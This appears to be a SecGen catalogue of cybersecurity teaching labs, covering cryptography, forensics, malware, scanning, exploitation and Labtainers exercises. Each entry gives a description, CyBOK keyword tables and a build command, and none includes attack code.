key pairs, encrypting and decrypting messages, and solving encryption-related quizzes. These practical exercises will deepen your understanding of RSA encryption and help you gain hands-on experience in using this cryptographic technique to secure information and communication.<br><br>This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot. |
| Type | ctf-lab; hackerbot-lab; lab-sheet |
| Author | Z. Cliffe Schreuders |
| VM names | desktop; hb_server |

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Applied Cryptography (AC) | Algorithms, Schemes and Protocols | CRYPTOGRAPHY - ASYMMETRIC - RSA; DIFFIE-HELLMAN ALGORITHM |
| Applied Cryptography (AC) | Public-Key Cryptography | public-key encryption; public-key signatures; RSA MODULUS; RSA PROBLEM; RSA TRANSFORM |
| Applied Cryptography (AC) | Key Management | key generation |
| Applied Cryptography (AC) | Cryptographic Implementation | Cryptographic Libraries; ENCRYPTION - TOOLS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/cyber_security_landscape/7_asymmetric_enc_rsa.xml run

View source

forensics/trashed_evidence.xml

Key Data
Name: Digital Forensics: Trashed Evidence
Description:
Introduction
Welcome to the world of digital forensics!

In this CTF problem-based learning task, you will be given a virtual machine (VM) representing a seized PC from an operative who works for an evil organization bent on global domination. Your task is to analyze the contents of the VM to gather evidence and identify any evidence of malicious activities on the machine.

In this task, you will be using digital forensics techniques to extract information from the VM, including files and internet history. This will involve retrieving deleted files, and identifying and extracting data hidden using steganography.

These tasks will require a combination of technical skills, creativity, and critical thinking. With your help we can discover more about their evil plans!

The password to log in is: tiaspbiqe2r
Type: ctf-lab
Author: Z. Cliffe Schreuders
VM names: seized_desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Forensics (F) | Operating System Analysis | artifact analysis; Steganography; Encoding and alternative data formats; Deleted files; SEARCH FOR EVIDENCE; METADATA; data recovery and file content carving; storage forensics; data abstraction layers; application artifacts; data acquisition; encryption concerns; Hidden files |
| Forensics (F) | Application Forensics | APPLICATION ARTIFACTS; web browsers; url history; SEARCH FOR EVIDENCE; URL HISTORY; Command history; Database analysis |
| Privacy & Online Rights (POR) | Privacy Technologies and Democratic Values | METADATA; STEGANOGRAPHY |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/forensics/trashed_evidence.xml run

introducing_attacks/1_intro_linux.xml

Key Data
Name: Introduction to Linux and Security lab
Description:
Introduction
In this lab, you will delve into the fascinating world of Linux and security tools, gaining practical knowledge and skills that are highly relevant in the field of cybersecurity. Linux is a powerful and versatile operating system widely used in the IT industry. Understanding Linux and its command-line interface is crucial for anyone interested in security testing and ethical hacking. You'll begin by familiarizing yourself with Linux basics, from fundamental command-line operations to concepts like piping between programs and file redirection. This lab will also introduce you to the Kali Linux distribution, a platform designed for penetration testing and ethical hacking.

Throughout this lab, you will learn how to perform various tasks, such as creating and manipulating files, exploring the Linux file system, and conducting network-related activities. You will gain hands-on experience with SSH, a secure remote shell protocol used for administration, and even attempt online brute force attacks to understand the importance of security in the digital realm. By the end of this lab, you will have honed your Linux command-line skills, developed a basic understanding of networking, and practiced using essential security tools, preparing you for more advanced challenges in the field of cybersecurity. Get ready to embark on an engaging journey where you will explore the core elements of Linux and security.

Lecture
Slides here

Reading
Chapters 1 "Introduction" and 2 "Unix History and Lineage": Garfinkel, S. and Spafford, G. and Schwartz, A. (2003), Practical Unix and Internet Security, O'Reilly. (ISBN-10: 0596003234)

Suggested:

Chapter 1 "An Overview of Computer Security": Bishop, M. (2005), Introduction to Computer Security, Addison-Wesley. (ISBN-10: 0321247442)
Lab sheet: https://docs.google.com/document/d/1vA_Ev_GPqPg3cGZblgVclWmTU-sUEEBqwYpFH09mQjg/edit?usp=sharing
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Network Protocols and Vulnerability | common network attacks |
| Security Operations & Incident Management (SOIM) | PENETRATION TESTING | PENETRATION TESTING - SOFTWARE TOOLS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/1_intro_linux.xml run

introducing_attacks/2_malware_msf_payloads.xml

Key Data
Name: Malware and an Introduction to Metasploit and Payloads
Description:
Introduction

In this hands-on lab you will dive into the intriguing world of malware and ethical hacking, exploring how attackers create and deploy malicious software to compromise computer systems. The lab introduces you to various types of malware, such as Trojan horses, viruses, and worms, shedding light on their distinct characteristics and functionalities. You will also get acquainted with the powerful Metasploit framework, a widely-used tool in the realm of ethical hacking, and learn how to generate malicious payloads using it.

Throughout this engaging learning experience, you will undertake practical tasks, such as creating a Trojan horse that adds a new user to a Windows system, evading anti-malware detection by encoding and utilizing executable templates, and experimenting with various payloads. These hands-on exercises will equip you with essential skills in understanding, generating, and testing malware, all within a controlled and ethical learning environment. Whether you're a budding ethical hacker or simply curious about the world of cybersecurity, this lab will provide valuable insights and practical knowledge in the field of malware and penetration testing. So, gear up to explore the darker side of computing and learn how to protect against it. You'll explore, experiment, and emerge with practical expertise in a controlled environment.

Lecture
Slides here

Reading
Chapter 23 "Protecting Against Programmed Threats": Garfinkel, S. and Spafford, G. and Schwartz, A. (2003), Practical Unix and Internet Security, O'Reilly. (ISBN-10: 0596003234) Available online via the library

Suggested:

Chapter 3 "Program Security": Pfleeger, C.P. and Pfleeger, S.L. (2007), Security in Computing, Prentice Hall. (ISBN-10: 0132390779)

Chapter 19 "Malicious Logic": Bishop, M. (2005), Introduction to Computer Security, Addison-Wesley. (ISBN-10: 0321247442)
Lab sheet: https://docs.google.com/document/d/1QsOLdqwBP6njIoKbeQRdattbLBLPFCB-eKHW0OxdE8U/edit?usp=sharing
Type: lab-sheet
Author: Z. Cliffe Schreuders
VM names: windows_victim; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malware Taxonomy | dimensions; kinds |
| Malware & Attack Technology (MAT) | Malware Analysis | anti-analysis and evasion techniques |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION FRAMEWORKS |
| Security Operations & Incident Management (SOIM) | PENETRATION TESTING | PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/2_malware_msf_payloads.xml run

introducing_attacks/3_vulnerabilities.xml

Key Data
Name: Vulnerabilities, Exploits, and Remote Access Payloads
Description:
Introduction
In this lab you will explore one of the major threats in computer security: software vulnerabilities. It's a critical topic in the field of cybersecurity, as understanding how attackers exploit weaknesses in software systems is essential for both defensive and offensive security measures. The lab will cover various aspects, starting with an introduction to software vulnerabilities and the causes behind them, moving on to explore different types of payloads, such as bind shells and reverse shells. You will also get hands-on experience with the Metasploit framework, a powerful tool for conducting security assessments and penetration testing.

Throughout this lab, you will gain a deeper understanding of software vulnerabilities, how exploits work, and the techniques attackers use to gain remote access to vulnerable systems. You will learn and apply both remote and local (client-side) exploits. You'll simulate creating and using a malicious PDF document to compromise a system, as well as remotely exploiting a system with known vulnerabilities. This hands-on experience will provide you with valuable insights into the world of cybersecurity and introduce you to the power of the Metasploit framework, a popular hacking and penetration testing tool.

Lecture
Slides here

Reading
Chapter 8 "Using Metasploit": Harper, A. and Harris, S. and Ness, J. and Eagle, C. and Lenkey, G. and Williams, T. (2011), Gray Hat Hacking: The Ethical Hacker's Handbook, McGraw-Hill. (ISBN: 978-0-07-174256-6) Available online via the library
Lab sheet: https://docs.google.com/document/d/11I8xMUXrT5ArJIsAhwGDtQ4RkH4l9CR4C2wh9_wz8xM/edit?usp=sharing
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: windows_victim; linux_victim_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION; EXPLOITATION FRAMEWORKS |
| Security Operations & Incident Management (SOIM) | PENETRATION TESTING | PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/3_vulnerabilities.xml run

introducing_attacks/4_dns_footprinting.xml

Key Data
Name: Information Gathering: Footprinting
Description:
Introduction
In this lab on information gathering, you will dive into the initial stage of preparing for various cybersecurity assessments and penetration tests. Information gathering involves understanding a target and its potential vulnerabilities by collecting data that can be used for social engineering attacks, identifying network ranges and exposed systems, and discovering various services that may be potential entry points for attackers. This lab focuses on identifying hosts using DNS (Domain Name System) and provides hands-on experience with tools and techniques that ethical hackers and security professionals use to gather valuable insights about their targets.

Throughout this lab, you will learn how to use DNS-related commands and tools to determine IP addresses associated with domain names, perform reverse DNS lookups, explore DNS zone transfers to identify servers, and utilize Whois to extract domain ownership information. You will also work with automated DNS footprinting tools like dnstracer, dnsmap, dnsenum, and dnsrecon to efficiently collect valuable data. By the end of this lab, you will have a solid foundation in information gathering techniques that are essential for ethical hacking and security testing, allowing you to move on to the scanning phase of a target assessment.

Lecture
Slides here

Reading
Part I Casing the establishment. McClure, S. and Scambray, J. and Kurtz, G. (2009), Hacking exposed, McGraw-Hill. (ISBN: 978-0-07-161375-0) Available online via the library
Lab sheet: https://docs.google.com/document/d/1Whs4c_mN7fFjtrYgg_uzmCGBH_EYjr7fTAgoM-OZTqQ/edit?usp=sharing
Type: lab-sheet
Author: Z. Cliffe Schreuders
VM names: kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Adversarial Behaviours (AB) | Models | kill chains |
| Malware & Attack Technology (MAT) | Malicious Activities by Malware | cyber kill chain |
| Network Security (NS) | PENETRATION TESTING | PENETRATION TESTING - DNS ZONE TRANSFER; EXPLOITATION FRAMEWORKS |
| Security Operations & Incident Management (SOIM) | PENETRATION TESTING | PENETRATION TESTING - NETWORK MAPPING - RECONNAISSANCE; PENETRATION TESTING - SOFTWARE TOOLS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/4_dns_footprinting.xml run

introducing_attacks/5_scanning.xml

Key Data
Name: Information Gathering: Scanning
Description:
Introduction
Information gathering and network scanning are processes aimed at understanding the structure of a network, identifying potential vulnerabilities, and ensuring the overall security of the network. Scanning is a critical stage for an attacker, since it can give them the information they need in order to launch an attack. By delving into this lab, you will acquire essential knowledge and practical skills necessary for both defensive and offensive security strategies.

This lab provides an in-depth exploration of scanning techniques. You will learn how to perform ping sweeps to identify live hosts on a network, create your own ping sweep bash script, and use Nmap (a popular and powerful open source tool) for host discovery. You will also explore the world of port scanning, creating your own port scanner using a bash script, and conducting SYN port scans. Additionally, you will gain insights into service identification through banner grabbing and protocol analysis, and discover methods to detect the operating system of a remote system. By the end of this lab, you will be equipped with a comprehensive understanding of network scanning techniques and will have hands-on experience in executing these scans to assess the security of target systems.

Reading
Chapter 2 Reconnaissance and Chapter 3 Scanning. Engebretson, P. (2011), The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy, Elsevier Inc. (ISBN: 978-1-59749-655-1) Available online via the library
Lab sheet: https://docs.google.com/document/d/1KScKw7M4Bt_FE5F_2tI6tnK1NrKNAJkyh5F2TpOh9hA/edit?usp=sharing
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: linux_victim_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Adversarial Behaviours (AB) | Models | kill chains |
| Malware & Attack Technology (MAT) | Malicious Activities by Malware | cyber kill chain |
| Network Security (NS) | PENETRATION TESTING | PENETRATION TESTING - NETWORK MAPPING - FINGERPRINTING; PENETRATION TESTING - NETWORK MAPPING - NMAP; PENETRATION TESTING - NETWORK MAPPING - PING |
| Security Operations & Incident Management (SOIM) | PENETRATION TESTING | PENETRATION TESTING - NETWORK MAPPING - RECONNAISSANCE; PENETRATION TESTING - SOFTWARE TOOLS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/5_scanning.xml run

introducing_attacks/6_exploitation.xml

Key Data
Name: From Scanning to Exploitation
Description:
Introduction
This lab provides hands-on experience in scanning and exploitation, allowing you to delve into the mindset of an ethical hacker. You will explore the process of moving from initial network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems.

In this lab, you will learn how to scan a network for vulnerable servers, use Metasploit and Armitage for exploitation, and search for vulnerabilities in online databases. Specifically, you will perform tasks such as running network scans using Nmap, importing scan results into Metasploit, searching for Metasploit exploits for various platforms and services, launching exploits to gain access to target systems, and using Armitage to automate certain aspects of the hacking process. By the end of the lab, you will have gained valuable insights into the tactics and techniques used by both malicious actors and cybersecurity professionals.

Reading
Chapter 2 Reconnaissance and Chapter 3 Scanning. Engebretson, P. (2011), The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy, Elsevier Inc. (ISBN: 978-1-59749-655-1) Available online via the library
Lab sheet: https://docs.google.com/document/d/1puLuKwqiFMTAZhMKKLhS_aK7kKwWnKw1e3StJBiFmFA/edit?usp=sharing
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: windows_server; linux_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Adversarial Behaviours (AB) | Models | kill chains |
| Malware & Attack Technology (MAT) | Malicious Activities by Malware | cyber kill chain |
| Software Security (SS) | Categories of Vulnerabilities | CVEs and CWEs |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION; EXPLOITATION FRAMEWORKS |
| Security Operations & Incident Management (SOIM) | PENETRATION TESTING | PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/6_exploitation.xml run

introducing_attacks/7_post-exploitation.xml

Key Data
Name: Post-exploitation
Description:
Introduction
Post-exploitation is the phase where an attacker, having gained initial access to a target system, aims to further exploit the compromised system, gather information, escalate privileges, and maintain access. Once an attacker has a foothold in a system, they can misuse the privileges they have “appropriated” to take actions on the system, or go on to try to gain even more access on this or other connected systems. In this lab, you will delve into the intricacies of post-exploitation in a controlled environment, gaining hands-on experience in a range of activities that mirror real-world cyberattacks.

You will learn the skills used by an attacker or security tester to take action once an exploit has been successful. Throughout this lab, you will learn how to identify and exploit vulnerabilities in a target system, understand the extent of access you have gained, and execute privilege escalation to elevate your control on the compromised system. You will compile and transfer a local privilege escalation exploit, collect password hashes, and discover sensitive data. Additionally, you will explore advanced payloads, such as Meterpreter, and experiment with features like keylogging and screen capturing. You will also understand the concept of pivoting, where you attack one system through another, and cover your tracks to maintain stealth. By the end of this comprehensive lab, you will have completed the essential stages of a typical cyberattack, enhancing your skills and knowledge in the field of cybersecurity.

Suggested reading
An excellent resource is Metasploit Unleashed.
Lab sheet: https://docs.google.com/document/d/1bt0yKzKjExEih5cmXyl-D__loGwV0UJxQJEDIXxCGxw/edit?usp=sharing
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: windows_server; linux_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Adversarial Behaviours (AB) | Models | kill chains |
| Malware & Attack Technology (MAT) | Malicious Activities by Malware | cyber kill chain; attack on confidentiality; integrity; availability |
| Malware & Attack Technology (MAT) | Attacks and exploitation | Post-exploitation: pivoting attacks; information gathering |
| Security Operations & Incident Management (SOIM) | PENETRATION TESTING | PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/7_post-exploitation.xml run

introducing_attacks/8_vulnerability_analysis.xml

Key Data
Name: Vulnerability Analysis
Description:
Introduction
It is important for organisations to manage the security of their systems and for security professionals to efficiently scan networks for vulnerabilities. Vulnerability assessment is a critical practice aimed at identifying and addressing weaknesses in computer systems. This process is instrumental in safeguarding networks and data from potential threats and attacks. In this lab, you will explore a range of industry-standard tools, such as Nmap, Nessus, and Nikto, to evaluate the security posture of vulnerable services. The lab provides a hands-on experience that will equip you with the skills and knowledge to detect vulnerabilities, assess their severity, and understand the importance of using different tools for comprehensive security assessments.

Throughout this lab, you will learn how to use Nmap and its Nmap scripting engine (NSE) to perform vulnerability scanning, discover potential weaknesses in a target system, and gain insights into the ethical hacking and penetration testing process. You will also explore Nessus, a commercial vulnerability scanner, and understand how it operates, what vulnerabilities it can identify, and how to interpret the results. Additionally, you will utilize Nikto, a web vulnerability scanner, to assess the security of web servers, identifying critical vulnerabilities. By completing tasks like initiating scans, analyzing results, and considering the limitations of automated tools, you will gain a practical understanding of vulnerability assessment and the role it plays in strengthening cybersecurity.

Lab sheet: https://docs.google.com/document/d/1rdNcOmYOjsRu97Gh3ds8HbTpORGxbMcd2Q7U4TATIbw/edit?usp=sharing
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: linux_server; kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | PENETRATION TESTING | VULNERABILITY ANALYSIS / VULNERABILITY SCANNING; AUDIT APPROACH; PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/8_vulnerability_analysis.xml run

labtainers/acl-hackerbot-flags.xml

Key Data
Name: Labtainers lab: acl
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authorisation | access control; enforcing access control; ACCESS CONTROL - DAC (DISCRETIONARY ACCESS CONTROL); Vulnerabilities and attacks on access control misconfigurations |
| Malware & Attack Technology (MAT) | MALCODE/MALWARE | trojan; backdoor; TROJANS - BACKDOOR |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | Access controls and operating systems; Linux security model; Unix File Permissions; filesystems; inodes; and commands; umask |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | Access controls and operating systems; Linux security model; Linux Extended Access Control Lists (facl) |
| Operating Systems & Virtualisation (OSV) | Role of Operating Systems | mediation |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/acl-hackerbot-flags.xml run

labtainers/acl.xml

Key Data
Name: Labtainers lab: acl
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authorisation | access control; enforcing access control; ACCESS CONTROL - DAC (DISCRETIONARY ACCESS CONTROL); Vulnerabilities and attacks on access control misconfigurations |
| Malware & Attack Technology (MAT) | MALCODE/MALWARE | trojan; backdoor; TROJANS - BACKDOOR |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | Access controls and operating systems; Linux security model; Unix File Permissions; filesystems; inodes; and commands; umask |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | Access controls and operating systems; Linux security model; Linux Extended Access Control Lists (facl) |
| Operating Systems & Virtualisation (OSV) | Role of Operating Systems | mediation |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/acl.xml run

labtainers/arp-spoof.xml

Key Data
Name: Labtainers lab: arp-spoof
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Network Protocols and Vulnerability | ADDRESS RESOLUTION PROTOCOL(ARP); ARP (ADDRESS RESOLUTION PROTOCOL); ARP SPOOFING; MITM (MAN-IN-THE-MIDDLE ATTACK); MAN-IN-THE-MIDDLE ATTACK (MITM); ATTACK(S) - ARP |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/arp-spoof.xml run

labtainers/backups.xml

Key Data
Name: Labtainers lab: backups
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | Execute: Mitigation and Countermeasures | Recover data and services after an incident; BACKUP - DIFFERENTIAL; BACKUP - INFERENTIAL |
| Security Operations & Incident Management (SOIM) | INCIDENT RESPONSE | RECOVERY - BACKUPS; RECOVERY; BACKUPS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/backups.xml run

labtainers/backups2.xml

Key Data
Name: Labtainers lab: backups2
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | Execute: Mitigation and Countermeasures | Recover data and services after an incident; BACKUP - DIFFERENTIAL; BACKUP - INFERENTIAL |
| Security Operations & Incident Management (SOIM) | INCIDENT RESPONSE | RECOVERY - BACKUPS; RECOVERY; BACKUPS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/backups2.xml run

labtainers/bufoverflow.xml

Key Data
Name: Labtainers lab: bufoverflow
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Software Security (SS) | Categories of Vulnerabilities | memory management vulnerabilities; Stack smashing buffer overflows |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development |
| Software Security (SS) | Mitigating Exploitation | ASLR (ADDRESS SPACE LAYOUT RANDOMIZATION); NON-EXECUTABLE MEMORY |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/bufoverflow.xml run

labtainers/capabilities.xml

Key Data
Name: Labtainers lab: capabilities
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | capabilities; Rule-based controls: Coarse grained: Linux capabilities |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/capabilities.xml run

labtainers/centos-log.xml

Key Data
Name: Labtainers lab: centos-log
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | application logs: web server logs and files; system and kernel logs; Syslog |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/centos-log.xml run

labtainers/centos-log2.xml

Key Data
Name: Labtainers lab: centos-log2
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | application logs: web server logs and files; system and kernel logs; Syslog |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/centos-log2.xml run

labtainers/denyhost.xml

Key Data
Name: Labtainers lab: denyhost
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Network Defence Tools | packet filters; intrusion detection systems; intrusion prevention systems |
| Security Operations & Incident Management (SOIM) | Execute: Mitigation and Countermeasures | intrusion prevention systems |
| Security Operations & Incident Management (SOIM) | CM (CONFIGURATION MANAGEMENT) | SSH (SECURE SHELL) |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/denyhost.xml run

labtainers/dmz-example.xml

Key Data
Name: Labtainers lab: dmz-example
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Network Defence Tools | DEMILITARISED ZONE (DMZ) |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/dmz-example.xml run

labtainers/dmz-lab.xml

Key Data
Name: Labtainers lab: dmz-lab
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Network Defence Tools | DEMILITARISED ZONE (DMZ) |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/dmz-lab.xml run

labtainers/file-deletion.xml

Key Data
Name: Labtainers lab: file-deletion
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Forensics (F) | Operating System Analysis | storage forensics; data recovery and file content carving |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/file-deletion.xml run

labtainers/file-integrity.xml

Key Data
Name: Labtainers lab: file-integrity
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authentication | access control; Protecting integrity |
| Forensics (F) | Operating System Analysis | cryptographic hashing; storage forensics; data recovery and file content carving |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | MONITORING - FILE INTEGRITY CHECKERS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/file-integrity.xml run

labtainers/formatstring.xml

Key Data
Name: Labtainers lab: formatstring
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION; Exploit development; Mitigation bypass: ASLR |
| Software Security (SS) | Categories of Vulnerabilities | memory management vulnerabilities; Format string attacks |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/formatstring.xml run

labtainers/gdblesson.xml

Key Data
Name: Labtainers lab: gdblesson
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments; STATIC ANALYSIS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/gdblesson.xml run

labtainers/grassmarlin.xml

Key Data
Name: Labtainers lab: grassmarlin
Description: A Labtainers lab.
Type: ctf-lab; lab-sheet
Author: Z. Cliffe Schreuders
VM names: desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems | characteristics; security and privacy concerns |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems Domains | industrial control systems; SUPERVISORY CONTROL AND DATA ACQUISITION (SCADA) |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/grassmarlin.xml run

labtainers/grfics.xml

Details

Key Data
Name Labtainers lab: grfics
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Adversarial Behaviours (AB) | Models | kill chains |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems | characteristics; protection against natural events and accidents; security and privacy concerns |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems Domains | industrial control systems |
| Network Security (NS) | Network Defence Tools | intrusion detection systems; network architecture design |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/grfics.xml run
```

View source

labtainers/ida.xml

Details

Key Data
Name Labtainers lab: ida
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments; STATIC ANALYSIS |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/ida.xml run
```

View source

labtainers/iptables-ics.xml

Details

Key Data
Name Labtainers lab: iptables-ics
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems Domains | industrial control systems |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems | security and privacy concerns |
| Network Security (NS) | Network Defence Tools | FIREWALLS; IPTables |
